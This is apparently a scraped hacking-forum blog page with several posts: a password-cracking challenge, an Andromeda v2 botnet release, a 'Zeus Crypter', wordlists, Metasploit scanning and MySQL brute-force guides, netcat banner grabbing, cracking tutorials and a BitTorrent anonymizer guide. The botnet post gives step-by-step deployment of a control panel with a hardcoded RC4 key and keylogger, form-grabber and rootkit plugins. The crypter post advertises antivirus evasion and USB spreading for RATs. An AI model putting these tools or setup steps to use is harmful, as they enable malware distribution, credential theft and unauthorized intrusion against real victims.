Find the Pass



Hello CHC(Chennai Hackers Connect) Members most of them cracked the previous two challenges.This is challenge gonna be difficult compared to the other two :)
Try to find out the password and make a comment .
The names of the person who cracks the password will be displayed in Board and FB page :)

Congrats dude.









Note : Comment the password along with the facebook id or gmail id


0 comments:

Andromeda v2 HTTP Botnet

Andromeda v2 + Todos sus Plugins

            Communication between the bot and the control panel are encrypted using RC4.During the installation you do not need administrator privileges or UAC to jump.This process is protected to prevent bot can be removed from the system.Firewall Bypass and injected into a trusted process.When properly installed, the exe will automatically be deleted.It works on systems from XP to 7, including x64.Weight is approximately 10KB file.Bypass more proactive anti-virus.Andromeda bot Description:Flexible modules bot. Based on this product, you can build a botnet with extremely diverse opportunities. Bot extended functions with the help of the plug-in can be loaded right quantity and at any time.Not limited by the number of supported backup field.Communication protocol between bots and the administrator is encrypted using RC4.Modules. You are free to convert their botnets for your needs at any time.System not agresiven, install without administrator rights, UAC does not pop up the window.Protect yourself unprepared users can not remove the bot from the system.Ignored firewall, not palitsya in the processes used to inject a reliable process.Do not throw out any DLL, not contains TLS, easy crypt.Regardless of the success of the original installation exe deleted.Works line from WinXP to Win7, including x64 systems.Small size, written entirely in assembly language.

Overview Ar3s'a
Control Panel:It is written in PHP with MySQL.Identify the program behind NAT.Calculate statistics for the botnet. Bots online / offline program / programs dead / statistics by country / statistics on the platform.Count the number of tasks completed / not completed.You can set a limit on the amount of work completed.You can give a specific reference to the bot.The distribution of tasks between the countries.Remove the entire article / remove dead bot framework.Screenshot of the admin panel:














Este bot viene con varios plugins; socks4, form grabber, keylogger, ring3 rootkit.

Aquí una imagen del builder que creó The Old Warrior.



Configuration

1. Upload /Panel files to androhost.com/andro
2. Create one mysql db.
3. Upload f.pack, r.pack and s.pack from /Plugins folder in: androhost.com/andro directory
4. chmod 777 androhost.com/andro/config.php, chmod 777 androhost.com/andro/fp_logs directory
5. Open in your browser androhost.com/andro/index.php?act=install.
6. Login with default creditials: admin:admin
7. Paste rc4 key to andromeda installation page. d40e75961383124949436f37f45a8cb6
8. Fill up all instalation page with your admin user and pasw, plus mysql details >> click 'Install'
9. After installation is done open in your browser androhost.com/andro/ifg.php
10. Delete androhost.com/andro/ifg.php and androhost.com/andro/GeoIPCountryWhois.csv.gz
11. Open Builder.exe > change host to: http://androhost.com/andro/image.php, rc4 key to: d40e75961383124949436f37f45a8cb6 and build your bin.
12. For enable plugins just go in panel > menu > tasks > add task
Task type = install plugin
Url= http://androhost.com/andro/r.pack
Click 'Enabled' and add your task.





0 comments:

Wordlist for BruteForce Attack

1.1 Million Wordlist for hacking








Hello CHC(Chennai Hackers Connect) Members ,To crack WPA/WPA2 pre-shared key.  you need a dictionary of words as input. Basically, aircrack-ng takes each word and tests to see if this is in fact the pre-shared key.
The first  easiest way is do an Internet search for word lists and dictionaries or check out web sites for password cracking tools.

Also Wordlist can be created using some tools .It also Available inbulid in Backtrack 5. For wordlist creation tutorial
Check here


 Download here


0 comments:

Zeus Crypter


Zeus Crypter [Bypass, Binder , Downloader ]










Features

-Power Options

---100% FUD Runtime and Scantime (By pass Kaspersky 2011, Avira and all others)

----Icon Changer

----Melt

----System Restore

----Outpost Firewall

----Windows Firewall

----Disable Regedit

-Spread Options:

----USB Spread

----Peer to Peer

-Anti Options:

----Virtual-Pc

----VMWare

----OllyDBG

----Virtual-box

----Reg Shot

----Sandboxie

----Anubis

----Joe Box

----CW-Sanbox

----Thread Expert

-Fake Error Message





Working with:

Blackshades NET

Cybergate

Dark Comet

Cerberus

Turkojan

Spy-Net

xLoader

iStealer

Blackshades Stealer

HostBooter

IRC Bots

DDoSer

Albertino's RAT

Null Bot

NoiseBot

Poison Ivy

ProRAT


Rapzo Logge

Swarm IRC Bot

many more..








Download here



1 comments:

Reverse Engineering Video Tutorial

CRACKING (Reverse Engineering) Tutorial Videos


This cracking video tutorial is very good for beginners who like to learn cracking (it's really recomended).
No previous knowledge is really needed !!!





With this video, you will learn :

Quote:
• Olly + assembler + patching a basic reverseme
• Keyfiling the reverseme + assembler
• Basic nag removal + header problems
• Basic + aesthetic patching
• Comparing on changes in cond jumps, animate over/in, breakpoints
• "The plain stupid patching method", searching for textstrings
• Intermediate level patching, Kanal in PEiD
• Debugging with W32Dasm, RVA, VA and offset, using LordPE as a hexeditor
• Explaining the Visual Basic concept, introduction to SmartCheck and configuration

• Continued reversing techniques in 
VB, use of decompilers and a basic anti-anti-trick
• Intermediate patching using Olly's "pane window"
• Guiding a program by multiple patching.
• The use of API's in software, avoiding doublechecking tricks
• More difficult schemes and an introduction to inline patching
• How to study behaviour in the code, continued inlining using a pointer
• Reversing using resources
• Insights and practice in basic (self)keygenning
• Diversion code, encryption/decryption, selfmodifying code and polymorphism
• Debugger detected and anti-anti-techniques
• Packers and protectors : an introduction


• Imports rebuilding
• API Redirection
• Stolen bytes
• Patching at runtime using loaders from lena151 original
• Continued patching at runtime & unpacking armadillo standard protection
• Machine specific loaders, unpacking & debugging armadillo
• tElock + advanced patching
• Bypassing & killing server checks
• Killing & inlining a more difficult server check
• SFX, Run Trace & more advanced string searching


• Delphi in Olly & DeDe
• Author tricks, HIEW & approaches in inline patching
• The FPU, integrity checks & loader versus patcher
• Reversing techniques in packed soft & A S&R loader for aspr
• Inlining inside polymorphic code
• Keygenning

Reversing with Lena151 - Newbie Tutorial Series 01-40



Download here

0 comments:

Vulnerability scanning Using Metasploit and WMAP


Vulnerability scanning



A vulnerability scanner is an automated computer program designed to assess computers,
computer systems, networks or applications and look for weaknesses. The program probes a
system by sending data to it and analyzing the responses received. To identify any
vulnerabilities on the target system, a vulnerability scanner uses its vulnerability database as
reference. Don’t forget that vulnerability scanners create a lot of traffic on a network and are not
suitable if one of your objectives is to remain undetected.

WMAP – web vulnerability Scanner
WMAP is a web vulnerability scanner and is integrated with Metasploit. First of all we have to
load wmap plugin by issuing the command:

load wmap

To perform your web scan follow these steps:

Add a new target url,
wmap_sites -a http://192.168.1.5

add the site as a target,
wmap_targets -t http://192.168.1.5

list the modules that will be used to scan the remote system,
wmap_run -t

scan the target system,
wmap_run -e

to see if wmap found anything interesting execute
hosts -c address, svcs, vulns

if wmap found any vulnerabilities issue the command
vulns

to get more details

NeXpose vulnerability Scanner
To import NeXpose vulnerability scanning report you have to import NeXpose xml file into MSF
database. To import xml file enter import followed by the report filename. for ex.
import /root/my_nexpose_scan.xml

To verify that the scanned hosts and vulnerability data was
imported properly, enter
hosts -c address,svcs,vulns

to check if everything was imported. Enter
vulns

to view details for the discovered vulnerabilities.

NeXpose plugin
There is a NeXpose plugin for Metasploit to run NeXpose from msfconsole. To perform a
vulnerability scan within NeXpose you have to:

Load NeXpose plugin,
load nexpose

if you need help enter
help

connect to your NeXpose server
nexpose_connect username:pass@127.0.0.1[:port]

launch a new scan with nexpose_scan followed by the the target IP address, for ex.
nexpose_scan 192.168.1.5

enter
hosts -c address,svcs,vulns

to view the results,
execute
vulns

to view details for the discovered vulnerabilities.

Nessus vulnerability Scanner
To import nessus vulnerability scanning report you have to download it first by selecting your
report and hitting download. Download report in .nessus format. To import the
Nessus results file enter import followed by the report filename. for ex.
import /root/nessus_report_ftp_target.nessus

To verify that the scanned hosts and vulnerability data
was imported properly, enter
hosts -c address,svcs,vulns

to check if your targeted ip addresses,
the number of services detected, and the number of vulnerabilities found by Nessus are in the
list. Like we did with wmap, enter
vulns

to view details for the discovered vulnerabilities.

Nessus plugin
There is also a Nessus plugin for Metasploit to control Nessus through Metasploit framework. To
perform a vulnerability scan within Nessus from within Metasploit follow these steps:

Load Nessus plugin,
load nessus

if you need help enter
nessus_help

authenticate to your Nessus server
nessus_connect username:pass@127.0.0.1:8834

list available scan policies by issuing,
nessus_policy_list

launch a new scan with nessus_scan_new followed by the policy number, a 
name for your scan, and your target IP address, for ex.
nessus_scan_new 1 scan_target 192.168.1.5

to see scan status while it’s running enter
nessus_scan_status

to list the available scan reports after the scan has completed, execute
nessus_report_list

command, identify the ID of the report you want to import and enter
nessus_report_get

to download the report and import it into the Metasploit database automatically. for ex
nessus_report_get 1d890f6b-be0d-1e8f-ea6f-fca1ea1402ef9563fbf028305b22

0 comments:

Bruteforcing MySQL using Metasploit

Bruteforcing MySQL




There is an auxiliary module in Metasploit called mysql_login which will happily query a MySQL
server for specific usernames and passwords.

To start your attack you have to set the RHOSTS option and choose a username and a password if you would like a single login query.

set RHOSTS 192.168.2.13

Let’s try a classical mysql user, root.

set USERNAME root

If you leave the password option and pass_file option blank mysql_login will attempt to login to MySQL server with blank password or with the username as password (root). Maybe we are lucky before we start brute-forcing database with a password list.

Using a password list
We can create our own password list, download one from the Internet or use backtrack’s password list /pentest/passwords/wordlists/rockyou.txt.

Let’s create one!

Creating a password list
To create our password list we are going to use crunch. If you are using BackTrack, as I do, crunch
is already installed.

Open Privilege Escalation -> Password Attacks -> Offline Attacks -> crunch.
Otherwise download it from here.

Execute:

./crunch 6 8 abcde123456 -o passfile.lst

The above command will create passwords between 6 and 8 characters long, consisting of ascii characters a,b,c,d,e and numbers 1,2,3,4,5,6 and all generated passwords will be saved into file passfile.lst.

Using the password list
Now that we have our password list stored in /pentest/passwords/crunch/passfile.lst, we can use it in mysql_login module.

set PASS_FILE /pentest/passwords/crunch/passfile.lst

Increase also the number of concurrent threads for a faster brute-force attack.

set THREADS 50
run

More
mysql_login module offers 2 interesting and useful options, USER_FILE and USERPASS_FILE. You can use a username file list to try various usernames by setting the USER_FILE option accordingly.

With USERPASS_FILE parameter you can use a file which contains both usernames and
passwords in the same file, each username is separated from the password with a space character and each username-password pair is written in a new line.


0 comments:

Netcat - Banner Grabbing

Banner Grabbing Using netcat!




To gather more information about a service running on a system’s open port we are going to use a known technique, known as banner grabbing and netcat network tool.
 nc -nvv x.x.x.x 80
-n        Suppress name/port resolutions
-v        Verbose
You will get an answer like this:
Connection to 85.25.132.39 80 port [tcp/*] succeeded!
if the connection was established.
Then type the following command:
HEAD / HTTP/1.0
To get the http headers:
HTTP/1.1 200 OK
Date: …..
Server: …..
Last-Modified: …..
ETag: ……
Accept-Ranges: bytes
Content-Length: ….
Vary: Accept-Encoding
Content-Type: text/html
Connection: close


0 comments:

RA1N VULNERABILITY Scanner



RA1N VULNERABILITY Scanner 0.5


Features:
  • Easy to use GUI
  • Gecko Browser engine
  • MD5 Decryption with salt support.
  • Google Dork scanning (in progress to making it load more)
  • SKID Proof <-- GF Noobs...
  • Advanced Dorking(over 1000's of dorks, and doesnt show https links


Download LinkRA1N Vuln Scanner


Screenshots:
[Image: Decryption.png]

[Image: MainPage.png]

Virus Scan:
https://www.virustotal.com/file/88f76e1f...339968391/


Download here

0 comments:

BTGuard To Anonymize Bittorrent Traffic

Use BTGuard To Anonymize Bittorrent Traffic

If you're using BitTorrent without taking special measures to hide your activity, it's just a matter of time before your ISP throttles your connection, sends you an ominous letter, or worst case, your ISP gets a subpoena from a lawyer asking for your identity for a file-sharing law suit. Here's how to set up a simple proxy to keep your torrenting safe and anonymous. 

Note, you don't need to be doing anything illegal. Maybe you just want to keep Big Brother out of your business and from throttling your connection. Either way, if you really want to keep your activity private, your best bet involves routing your BitTorrent connection through an external service. BTGuard is a dead simple BT-focused proxy server and encryption service, and it's my service of choice. Below, I'll explain what it does, how it works, and how to set it up to privatize and anonymous your BT traffic.



When you download or seed a torrent, you're connecting to a bunch of other people, called a swarm, all of whom—in order to share files—can see your computer's IP address. That's all very handy when you're sharing files with other netizens, but file sharers such as yourself aren't necessarily the only people paying attention. Piracy monitoring groups (often paid for by the entertainment industry either before or after they find violators) also join BitTorrent swarms, but instead of sharing files, they're logging the IP addresses of other people in the swarm—including you—so that they can notify your ISP of your doings.A proxy(like BTGuard) funnels your internet traffic—in this case, just your BitTorrent traffic—through another server, so that the BitTorrent swarm will show an IP address from a server that can't be traced back to you instead of the address that points to your house. That way, those anti-piracy groups can't contact your ISP, and your ISP has no cause to send you a harrowing letter.
But wait, can't the piracy groups then go to the anonymizer service (BTGuard) and requisition their logs to figure out that you're the one downloading the new Harry Potter? Theoretically, yes, but the reason why we chose BTGuard is because they don't keep logs, so there's no paper trail of activity leading back to you. All the piracy monitors see is BTGuard sharing a file, and all your ISP sees is you connecting to BTGuard—but not what data you're downloading, because it's encrypted.If you subscribe to an ISP that throttles BitTorrent traffic, and aren't using an anonymizer service, you have an additional problem. Your ISP can still see what you're doing, and if they detect that you're using BitTorrent—even if you're using it for perfectly legal purposes—they'll throttle your connection so you get unbearably slow speeds. When you encrypt your BitTorrent traffic, your ISP can't see what you're using your connection for. They'll see that you're downloading lots of information, but they won't be able to see that it's BitTorrent traffic, and thus won't throttle your connection. You still have to be careful of going over your ISP's bandwidth cap, however, if that exists.BTGuard offers you both a proxy (to combat spying) and encryption (to combat throttling)—though many torrent clients have encryption built-in as well.First, BTGuard isn't free. At $7/month (as little as $5 if you pay for a year in advance), it isn't very expensive, and we think it's well worth it if you want to torrent anonymously. A law suitsettlement, if it comes to that, will cost you at least a couple thousand dollars, which equals a couple decades of BTGuard subscriptions, so keep that in mind, too. The other potential downside is that piping your downloads through another service may decrease your upload and download speeds. How much depends on what torrent you're downloading, who from, and a lot of other factors, but just know that it's a possibility. In my experience, more popular torrents stayed at their top speed of 1.4 MB/s (my bandwidth cap) with a proxy, while other less popular torrents (which flew at 1.4MB/s without a proxy) would fluctuate around 200 or 300 kB/s with BTGuard in place. Again, though, a little longer wait on downloads is well worth the protection you get.Lastly, proxies aren't supported by every client, which means you'll have to use one with more advanced features. uTorrent (for Windows) and Vuze (for Windows, Mac, and Linux) both support proxies, but sadly Mac and Linux favorite Transmission does not. (If you're absolutely stuck with a client that doesn't support proxies, check the end of this article for some alternative solutions to the anonymity problem.)


How to Set Up BTGuard

BTGuard has a one-click install process, but we're going to show you how to do it the manual way, since it works in any BitTorrent client that supports SOCKS5 Proxy—not just the ones supported by BTGuard's installer. It'll also give you a better sense of what exactly BTGuard does, so if you run into problems, you'll have a better idea of how to fix it.

Step One: Sign Up for BTGuard

First, sign up for an account over at BTGuard.com. It'll just take a minute, and then you can get to configuring your client. Their BitTorrent proxy service costs $6.95 a month, but you can get discounts by buying multiple months at a time (up to a year's service for $59.95). Once you're done, you should receive an email telling you that BTGuard is ready to go.

Step Two: Configure Your Client

Next, open up your torrent client of choice and find the proxy settings within its preferences. In uTorrent, for example, this is under Preferences > Connection. Your client may have them in a different place (Google around to find out where), but no matter your client, your settings should look like this:

  • Proxy Type: Socks v5
  • Proxy Host: proxy.btguard.com
  • Proxy Port: 1025
  • Username: Your BTGuard username
  • Password: Your BTGuard password
You'll also want to make sure you're using the proxy for hostname or tracker lookups as well as peer-to-peer connections, so check all boxes that say anything like that. You'll also want to disable connections or features that could compromise the proxy, so check all the boxes under uTorrent's "Proxy Privacy" section, or anything similar that your client may have. Hit Apply, exit the preferences, and restart your client. Your proxy should now be active.


Step Three: See If It's Working



To ensure that it's working, head over to CheckMyTorrentIP.com. This site can tell you what your IP address is, and compare it to the IP address of your torrent client, which will let you know whether your proxy is working correctly. To test it, hit the "Generate Torrent" button, and open the resulting torrent in your client. Then, go back to your browser and hit the Refresh button under the "Check IP" tab. If it's the same as your browser IP—which you'll see next to the Refresh button—then your proxy isn't working, and you'll want to double-check all of the above settings. If it shows a different IP address (often from another country like Germany or Canada), then BTGuard is successfully tunneling all your traffic for you.


Step Four (Optional): Enable Encryption

If you want extra security (or if you're trying to protect your connection from being throttled), you'll also want to encrypt all that traffic. Many clients have this feature built-in. In uTorrent, for example, just head to Preferences > BitTorrent and look for the "Protocol Encryption" section. Change your outgoing connection to Forced encryption, and uncheck the "Allow incoming legacy connections" box. From there, you should be good—your ISP shouldn't throttle your connection after this is enabled.

If your client doesn't support encryption, or you want a more powerful encryption behind your torrenting, BTGuard offers an encryption service as well. Just head to their Encryption page,download the software, and install it to C:\BTGUARD (this is very important; don't change the installation directory). Then, start the BTGuard Encryption program (accessible from the Start menu), and open up your BitTorrent client. Change your proxy server from proxy.btguard.com to 127.0.0.1, restart your client, and you're golden. Again, this isn't necessary if your client already supports encryption, but it is an extra layer of protection if you really want to keep everything private.

BitTorrent isn't the safe place it once was, and if you're going to use it to share and download files, we highly recommend getting some sort of protection from the services above so you can avoid DCMA notices and throttled speeds.



0 comments: